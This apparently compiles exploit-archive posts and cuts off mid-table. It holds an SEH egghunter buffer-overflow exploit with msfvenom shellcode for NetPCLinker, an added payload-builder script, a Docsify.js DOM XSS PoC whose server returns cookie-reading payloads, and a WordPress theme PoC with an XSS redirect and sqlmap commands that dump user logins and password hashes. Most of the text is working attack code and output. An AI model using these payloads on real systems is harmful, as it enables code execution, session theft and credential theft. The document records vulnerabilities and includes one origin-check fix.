# Version: 1.0.0.0
# Tested on: Windows Vista SP1

#!/usr/bin/python
'''
# Replicate Crash:
1) Install and Run the application
2) Go to second tab "Clients Control Panel"
3) Press Add button
4) Run the exploit , the exploit creates a text file named payload.txt
5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
6) Press OK . Your shellcode will be executed by pressing OK button.
'''

#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
#Bad Characters : \x0a\x0d\x33\x35\x36
shellcode = (
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
"\x44\xbf\x0f\x56\x04\x40"
)

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nSEH = '\xEB\xAA\x90\x90' #Jump Back

# (Vista)
# PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)
SEH = '\x67\x4b\x49'

offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)
payload = offset+egghunter+"\x90"*50+nSEH+SEH

try:
    f=open("payload.txt","w")
    print("[+] Creating %s bytes payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
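Three things have to line up in an SEH egghunter payload like the one above: the egg prefix must be two copies of the tag compiled into the hunter, the short jump in nSEH must land on bytes that are safe to execute and fall through into the hunter, and the whole string must be free of bad characters except for the NUL that the program's own string terminator supplies as the top byte of the SEH address. The builder below is an added example, not the post author's script: it reuses the post's 32-byte egghunter, nSEH bytes, pop/pop/ret address and 1199-byte nSEH offset, decodes the tag out of the hunter's `mov eax, imm32` and the displacement out of the `jmp short`, then reports where the jump lands relative to the hunter. The shellcode is a constructed NOP placeholder.

```python
import re
import struct

BADCHARS = bytes([0x00, 0x0A, 0x0D, 0x33, 0x35, 0x36])   # from the post
NSEH_OFFSET = 1199     # bytes before the next-SEH pointer, as in the post
SLED = 50              # NOPs between the egghunter and nSEH, as in the post
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")   # the post's hunter
NSEH = b"\xeb\xaa\x90\x90"      # jmp short back, as in the post
SEH_ADDR = 0x00494b67           # pop pop ret in NPL.exe; top byte is NUL


def find_badchars(blob: bytes, badchars: bytes = BADCHARS) -> list:
    return sorted({b for b in blob if b in badchars})


def egghunter_tag(hunter: bytes) -> bytes:
    """Pull the 4-byte tag out of the NtAccessCheckAndAuditAlarm egghunter:
    'mov eax, imm32' (B8 xx xx xx xx) followed by 'mov edi, edx; scasd'."""
    m = re.search(rb"\xb8(.{4})\x8b\xfa\xaf", hunter, re.DOTALL)
    if not m:
        raise ValueError("no 'mov eax, imm32; mov edi, edx; scasd' sequence found")
    return m.group(1)


def short_jmp_displacement(nseh: bytes) -> int:
    """Decode 'jmp short rel8' (EB xx); rel8 is signed and counted from the
    end of the 2-byte instruction."""
    if nseh[0] != 0xEB:
        raise ValueError("nSEH does not start with a short jmp")
    return struct.unpack("<b", nseh[1:2])[0]


def build_payload(shellcode: bytes, hunter: bytes = EGGHUNTER,
                  nseh: bytes = NSEH, seh_addr: int = SEH_ADDR) -> tuple:
    """egg | shellcode | 'A' filler | egghunter | NOP sled | nSEH | SEH (3 bytes).
    Returns (payload, layout) where layout records every offset and whether the
    nSEH jump lands on 0x41 filler (inc ecx) or the hunter itself."""
    tag = egghunter_tag(hunter)
    egg = tag * 2
    filler = NSEH_OFFSET - len(egg) - len(shellcode) - len(hunter) - SLED
    if filler < 0:
        raise ValueError("shellcode too large for the space before nSEH")
    body = egg + shellcode + b"\x41" * filler
    hunter_at = len(body)
    seh = struct.pack("<I", seh_addr)
    if seh[3] == 0:
        seh = seh[:3]          # the string's own terminator supplies the NUL
    payload = body + hunter + b"\x90" * SLED + nseh + seh
    bad = find_badchars(payload)
    if bad:
        raise ValueError("payload contains bad chars: " + " ".join(f"\\x{b:02x}" for b in bad))
    lands_at = NSEH_OFFSET + 2 + short_jmp_displacement(nseh)
    layout = {
        "egg": egg,
        "shellcode_at": len(egg),
        "egghunter_at": hunter_at,
        "nseh_at": NSEH_OFFSET,
        "seh_at": NSEH_OFFSET + len(nseh),
        "jump_lands_at": lands_at,
        "safe_landing": len(egg) + len(shellcode) <= lands_at <= hunter_at,
    }
    return payload, layout


if __name__ == "__main__":
    payload, layout = build_payload(b"\x90" * 100)   # constructed placeholder shellcode
    with open("payload.txt", "wb") as fh:
        fh.write(payload)
    print(f"[+] {len(payload)} bytes; jump lands {layout['egghunter_at'] - layout['jump_lands_at']} "
          f"bytes before the egghunter (safe={layout['safe_landing']})")
```

With the post's constants the jump lands two bytes before the hunter, on two `inc ecx` bytes, which is why the 0x41 filler matters: swap it for arbitrary junk and the short jump may land on an instruction that never reaches the hunter.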
-
Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Date: 2020-06-22
# Exploit Author: Amin Sharifi
# Vendor Homepage: https://docsify.js.org
# Software Link: https://github.com/docsifyjs/docsify
# Version: 4.11.4
# Tested on: Windows 10
# CVE : CVE-2020-7680

docsify.js uses fragment identifiers (parameters after the # sign) to load resources from server-side .md files. It then renders the .md file inside the HTML page. For example, https://docsify.js.org/#/quickstart sends an ajax request to https://docsify.js.org/quickstart.md and renders it inside the HTML page. Due to lack of validation it is possible to provide external URLs after the /#/ and render arbitrary JavaScript/HTML inside the page, which leads to DOM-based Cross Site Scripting (XSS).

Steps to reproduce:

step 1. Set up a server (for example I use flask here; for the PoC I'm hosting one on https://asharifi.pythonanywhere.com).

step 2. The server should respond to requests to /README.md with a crafted XSS payload. Here is the payload:
"Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
Also CORS should be set so that other origins would be able to send ajax requests to the server, so Access-Control-Allow-Origin must be set to * (or to the specific domain that you wanna exploit). Example code below:

-------------------------------------------------
from flask import Flask
import flask

app = Flask(__name__)

@app.route('/README.md')
def inject():
    resp = flask.Response("Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
    resp.headers['Access-Control-Allow-Origin'] = '*'
    return resp

if __name__ == '__main__':
    app.run()
------------------------------------------------------

step 3. Craft the link for execution of the exploit. For example, for the https://docsify.js.org website you can create the link as below:
https://docsify.js.org/#//asharifi.pythonanywhere.com/README
(note that the mentioned domain is no longer vulnerable at the time of writing this report)
When a user visits this URL an ajax request will be sent to asharifi.pythonanywhere.com/README.md and the response of the request will be rendered inside the webpage, which results in the XSS payload being executed on the page.

snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
Mitre CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
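The root cause is that the route after `#` is resolved as a URL without checking where it ends up: `#/quickstart` becomes `/quickstart.md` on the same origin, but `#//asharifi.pythonanywhere.com/README` is a protocol-relative URL and becomes `https://asharifi.pythonanywhere.com/README.md`, which the page then fetches and renders. The snippet below is an added example, not docsify's code or the post author's: it models that route-to-file step in a few lines (an approximation of docsify's routing, not a copy of it), shows the unchecked resolution beside a same-origin check that rejects any route resolving to a different scheme or host, and uses the page's own example routes as inputs.

```python
from urllib.parse import urljoin, urlsplit

SITE = "https://docsify.js.org/"


def route_to_resource(route: str) -> str:
    """Simplified model of how a '#/...' route becomes a Markdown file name:
    '#/quickstart' -> '/quickstart.md', '#/' -> '/README.md'."""
    route = route.lstrip("#")
    if route == "" or route.endswith("/"):
        route += "README"
    if not route.endswith(".md"):
        route += ".md"
    return route


def resolve_unchecked(base: str, route: str) -> str:
    """What the vulnerable version effectively fetches: the route goes to the
    URL resolver as-is, so '//host/...' (protocol-relative) or 'http://host/...'
    escapes the site and is fetched cross-origin."""
    return urljoin(base, route_to_resource(route))


def resolve_same_origin(base: str, route: str) -> str:
    """Hardened variant: resolve, then refuse anything that left the base origin."""
    url = resolve_unchecked(base, route)
    b, u = urlsplit(base), urlsplit(url)
    if (u.scheme, u.netloc) != (b.scheme, b.netloc):
        raise ValueError(f"route {route!r} resolves off-origin to {url}")
    return url


if __name__ == "__main__":
    for route in ("#/quickstart", "#//asharifi.pythonanywhere.com/README", "#/"):
        try:
            print(route, "->", resolve_same_origin(SITE, route))
        except ValueError as err:
            print(route, "-> blocked:", err, "| unchecked:", resolve_unchecked(SITE, route))
```

The origin check stops the cross-origin fetch described in the post; it does not sanitise the Markdown itself, so on a site where untrusted users can publish `.md` files the rendered HTML still needs filtering.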
-
WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Google Dork: inurl:/wp-content/themes/nexos/
# Date: 2020-06-17
# Exploit Author: Vlad Vector
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
# Software Version: 1.7
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Tested on: Debian 10
# CVE: CVE-2020-15363, CVE-2020-15364
# CWE: CWE-79, CWE-89

### [ Info: ]

[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS
[x] SQL Injection

### [ PoC Unauthenticated Reflected XSS: ]

[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>

[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com

### [ PoC SQL Injection: ]

[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema

[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: TARGET-DB
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+